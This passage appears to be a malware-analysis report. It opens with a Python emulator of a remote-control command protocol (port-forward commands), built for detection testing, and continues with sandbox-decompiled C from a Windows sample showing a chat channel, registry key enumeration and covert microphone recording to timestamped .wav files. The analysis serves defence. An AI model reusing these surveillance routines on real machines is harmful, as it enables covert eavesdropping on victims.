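    table = ForwardTable(listening_port=1024)   # constructed value
    for raw in ("GetDirectListeningPort", "StartForward|10.0.0.5|8080",
                "StartReverse|10.0.0.5|80abc", "StopForward|10.0.0.5|abc",
                "StopForward|10.0.0.5|8080"):
        cmd = parse_command(raw)
        print(raw, "->", table.apply(cmd) if cmd else "ignored")
```

The point of the atoi emulation is visible in the last three inputs: "80abc" is accepted as port 80, while "abc" yields 0 and is dropped by the range check; a reimplementation that used int() would reject the first and raise on the second, so a protocol emulator built for detection testing would disagree with the real handler on exactly the malformed inputs an operator is most likely to send by accident.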

                                  C-Code - Quality: 34%
                                  			E0040295E(void* __eflags, intOrPtr _a4, char _a7) {
                                  				char _v5;
                                  				void* _v12;
                                  				char _v28;
                                  				void* _v44;
                                  				char _v60;
                                  				char _v76;
                                  				char _v92;
                                  				struct tagMSG _v120;
                                  				int _t29;
                                  				void* _t35;
                                  				intOrPtr _t41;
                                  				void* _t45;
                                  				void* _t50;
                                  				void* _t51;
                                  				void* _t62;
                                  				void* _t63;
                                  				intOrPtr _t95;
                                  				void* _t97;
                                  				void* _t101;
                                  				void* _t104;
                                  				void* _t105;
                                  				void* _t107;
                                  
                                  				_t107 = __eflags;
                                  				_t95 = _a4;
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t95 + 0x18);
                                  				_t29 = SetEvent( *(_t95 + 0x28));
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				E004129EB(_t107,  &_v28,  &_v76, 0x41b310,  &_v76, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                  				_t104 = _t101 + 0x24;
                                  				_t97 =  *_t29 - 0x3a;
                                  				if(_t97 == 0) {
                                  					_t35 = E0040180C( &_v28, __eflags, 0);
                                  					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  					_t62 = E00406DD9(_t35);
                                  					__eflags = _t62;
                                  					if(_t62 == 0) {
                                  						L12:
                                  						E004017DD( &_v28);
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						__eflags = 0;
                                  						return 0;
                                  					}
                                  					 *0x41b794 = E00407033(_t62, "DisplayMessage");
                                  					 *0x41b798 = E00407033(_t62, "GetMessage");
                                  					_t41 = E00407033(_t62, "CloseChat");
                                  					_t105 = _t104 + 8;
                                  					 *0x41b79c = _t41;
                                  					 *0x41b790 = 1;
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  					E004020C2(_t95, 0x74, 0x41b738);
                                  					L10:
                                  					_t63 = HeapCreate(0, 0, 0);
                                  					_t45 =  *0x41b798(_t63,  &_v12);
                                  					__eflags = _t45;
                                  					if(_t45 != 0) {
                                  						_t105 = _t105 - 0x10;
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t45,  &_v5);
                                  						E004020C2(_t95, 0x3b, _v12);
                                  						HeapFree(_t63, 0, _v12);
                                  					}
                                  					goto L10;
                                  				}
                                  				_t109 = _t97 != 1;
                                  				if(_t97 != 1) {
                                  					goto L12;
                                  				}
                                  				_t50 = E00412881( &_v92);
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_v92, E0040180C( &_v28, _t109, 0));
                                  				_t51 =  *0x41b794(_t50);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				if(_t51 == 0) {
                                  					goto L12;
                                  				}
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_a7);
                                  				E00412855( &_v60, _t104 - 0x10,  &_v60);
                                  				E004020C2(_t95, 0x3b, 0x41576c);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				L4:
                                  				while(GetMessageA( &_v120, 0, 0, 0) <= 0) {
                                  					if(__eflags >= 0) {
                                  						goto L12;
                                  					}
                                  				}
                                  				TranslateMessage( &_v120);
                                  				DispatchMessageA( &_v120);
                                  				goto L4;
                                  			}
                                  [Instruction address column for the decompiled function above, one address per C line: 0x0040295e to 0x00402b53, 0x00000000 for lines without a mapped instruction]

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402971
                                  • SetEvent.KERNEL32(?), ref: 0040297A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00402983
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 0040299B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 004029AB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004029BA
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004029F5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00402A08
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041576C,?), ref: 00402A22
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000003B), ref: 00402A45
                                  • GetMessageA.USER32 ref: 00402A52
                                  • TranslateMessage.USER32(?), ref: 00402A60
                                  • DispatchMessageA.USER32 ref: 00402A6A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402A87
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B738,00000000,DisplayMessage), ref: 00402ADF
                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074), ref: 00402AF1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00402B17
                                  • HeapFree.KERNEL32(00000000,00000000,?,0000003B), ref: 00402B2B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B3E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B47
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$V01@@$?c_str@?$basic_string@?length@?$basic_string@$D@1@@MessageV12@$?substr@?$basic_string@G@1@@Heap$??2@??3@??4?$basic_string@?find@?$basic_string@CreateDispatchEventFreeTranslateV01@
                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                  • API String ID: 1701728818-749203953
                                  • Opcode ID: 05f6091bb8e4fb570316d0bc2ae79ecd824646f3970f9e54cc59898a20bb853e
                                  • Instruction ID: 706d1787dbe5d31282a01ee588047493408fae45c62342a208237384888500fd
                                  • Opcode Fuzzy Hash: 05f6091bb8e4fb570316d0bc2ae79ecd824646f3970f9e54cc59898a20bb853e
                                  • Instruction Fuzzy Hash: 75517F72A00608EBCB14ABE1ED4D9EE7B7CEF84355B10403AF502E31D1DBB85545CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 34%
                                  			E0040BE34(char _a4, short* _a20, intOrPtr _a24, char _a27) {
                                  				void* _v8;
                                  				char _v24;
                                  				char _v40;
                                  				char _v56;
                                  				char _v72;
                                  				char _v88;
                                  				char _v104;
                                  				char _v120;
                                  				char _v136;
                                  				char _v152;
                                  				void* _t28;
                                  				long _t29;
                                  				void* _t35;
                                  				char* _t38;
                                  				char* _t39;
                                  				char* _t40;
                                  				char* _t41;
                                  				char* _t42;
                                  				char* _t43;
                                  				char* _t44;
                                  				void* _t54;
                                  				void* _t56;
                                  				char* _t73;
                                  				void* _t77;
                                  				void* _t79;
                                  
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				_t28 = E0040BD9B( &_a4);
                                  				_t79 = _t77 - 0x10 + 0x10;
                                  				_t47 = 0;
                                  				_t29 = RegOpenKeyExW(_t28, _a20, 0, 0x20019,  &_v8);
                                  				_t90 = _t29;
                                  				if(_t29 != 0) {
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
                                  					E004020C2(0x41bde0, 0x72, "3");
                                  				} else {
                                  					E0040BB20( &_v8, _t90, _v8);
                                  					_pop(_t54);
                                  					_t73 = "0";
                                  					if(_a24 != 0) {
                                  						_t73 = "1";
                                  					}
                                  					_t35 = E00412855(_t54,  &_v152, 0x41bdd0);
                                  					_t56 = 0x41b310;
                                  					_t38 =  &_v88;
                                  					L00414176();
                                  					_t39 =  &_v56;
                                  					L00414140();
                                  					_t40 =  &_v40;
                                  					L00414140();
                                  					_t41 =  &_v24;
                                  					L00414140();
                                  					_t42 =  &_v72;
                                  					L00414140();
                                  					_t43 =  &_v104;
                                  					L00414140();
                                  					_t44 =  &_v136;
                                  					L00414140();
                                  					L00414140();
                                  					E004020C2(0x41bde0, 0x71, _t79 - 0x10);
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t44, _t44, _t43, _t43, _t42, _t42, _t41, _t41, _t40, _t40, _t39, _t39, _t38, _t38, _t73, 0x41b310, E00412855(_t56,  &_v120, 0x41be40), 0x41b310, _t35, 0x41be30, 0x41b310, 0x41be50);
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(0x415800);
                                  					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(0x415800);
                                  					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
                                  					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
                                  					RegCloseKey(_v8);
                                  					_t47 = 1;
                                  				}
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return _t47;
                                  			}

                                  [Instruction address column for the decompiled function above, one address per C line: 0x0040be49 to 0x0040c00b]

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,00000004), ref: 0040BE49
                                    • Part of subcall function 0040BD9B: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00000004,?,0040BE54,?,?,00000004), ref: 0040BDAE
                                    • Part of subcall function 0040BD9B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE1E
                                  • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,0040C731), ref: 0040BE67
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00415B14,0041B310,00000000,0041B310,00000000,0041B310,0041BE30,0041B310,0041BE50), ref: 0040BECF
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041BE30,0041B310,0041BE50), ref: 0040BEDC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,0041BE50), ref: 0040BEE9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,0041BE50), ref: 0040BEF6
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,0041BE50), ref: 0040BF03
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040BF10
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040BF20
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040BF2A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000071), ref: 0040BF44
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF4D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF56
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF5F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF68
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF71
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF7A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF83
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF8F
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00415800), ref: 0040BFA0
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00415800), ref: 0040BFAC
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 0040BFBD
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 0040BFC9
                                  • RegCloseKey.ADVAPI32(0040C731), ref: 0040BFD2
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B1C,?), ref: 0040BFEA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000072), ref: 0040BFFF
                                    • Part of subcall function 0040BB20: RegQueryInfoKeyW.ADVAPI32 ref: 0040BB8F
                                    • Part of subcall function 0040BB20: RegEnumKeyExW.ADVAPI32 ref: 0040BBBE
                                    • Part of subcall function 0040BB20: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?), ref: 0040BBD4
                                    • Part of subcall function 0040BB20: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040BBE6
                                    • Part of subcall function 0040BB20: ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0040BE7D,0040C731), ref: 0040BBF4
                                    • Part of subcall function 0040BB20: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BBFD
                                    • Part of subcall function 0040BB20: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BC06
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$D@2@@0@Hstd@@$G@std@@V10@0@$G@2@@std@@$V01@$??4?$basic_string@$??0?$basic_string@$V01@@V10@@$??8std@@CloseD@1@@EnumG@1@@G@2@@0@InfoOpenQueryY?$basic_string@
                                  • String ID:
                                  • API String ID: 3909728815-0
                                  • Opcode ID: b1cfcf78c7c26c0e573a20c40788f4b991fe636cd3f8b8d691f423e018ab4417
                                  • Instruction ID: 9e337717dcf7d24ebdd05483ab6efa78b4c81bdad12c42f1fd6fa3557793e14f
                                  • Opcode Fuzzy Hash: b1cfcf78c7c26c0e573a20c40788f4b991fe636cd3f8b8d691f423e018ab4417
                                  • Instruction Fuzzy Hash: 7741477290020DEBCB04BBE1ED4ADDE7B7CDF94345B10403AF506A7152EB785A85CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 20%
                                  			E00401640(void* __edx, intOrPtr _a8, char _a11) {
                                  				char _v5;
                                  				char _v12;
                                  				void* _v28;
                                  				char _v44;
                                  				char _v60;
                                  				char _v76;
                                  				char _v92;
                                  				char _v108;
                                  				char _v188;
                                  				int _t23;
                                  				char* _t25;
                                  				char* _t32;
                                  				char* _t33;
                                  				char* _t34;
                                  				CHAR* _t36;
                                  				intOrPtr _t37;
                                  				void* _t56;
                                  
                                  				_t23 =  &_v5;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z(_t23);
                                  				if(_a8 == 0x3c0) {
                                  					__imp__time( &_v12, _t56);
                                  					_t25 =  &_v12;
                                  					__imp__localtime(_t25);
                                  					__imp__strftime( &_v188, 0x50, "%Y-%m-%d %H.%M", _t25);
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v188,  &_a11);
                                  					_t32 =  &_v76;
                                  					L00414152();
                                  					_t33 =  &_v108;
                                  					L0041414C();
                                  					_t34 =  &_v60;
                                  					L00414146();
                                  					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t34, _t34, _t33, _t33, _t32, _t32, 0x41b1e8, 0x5c, E00412795( &_v92,  &_v44), L".wav");
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					E004013BE(_t34, 0x41b1a0);
                                  					_t36 = waveInUnprepareHeader(E0041B210, 0x41b1a0, 0x20);
                                  					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  					0x41b1a0->lpData = _t36;
                                  					_t37 =  *0x41b1d8; // 0x0
                                  					 *0x41b1a4 = _t37;
                                  					 *0x41b1a8 = 0;
                                  					 *0x41b1ac = 0;
                                  					 *0x41b1b0 = 0;
                                  					 *0x41b1b4 = 0;
                                  					waveInPrepareHeader(E0041B210, 0x41b1a0, 0x20);
                                  					_t23 = waveInAddBuffer(E0041B210, 0x41b1a0, 0x20);
                                  				}
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				return _t23;
                                  			}

                                  APIs
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00401650
                                  • time.MSVCRT ref: 00401668
                                  • localtime.MSVCRT ref: 00401672
                                  • strftime.MSVCRT ref: 00401687
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 0040169E
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
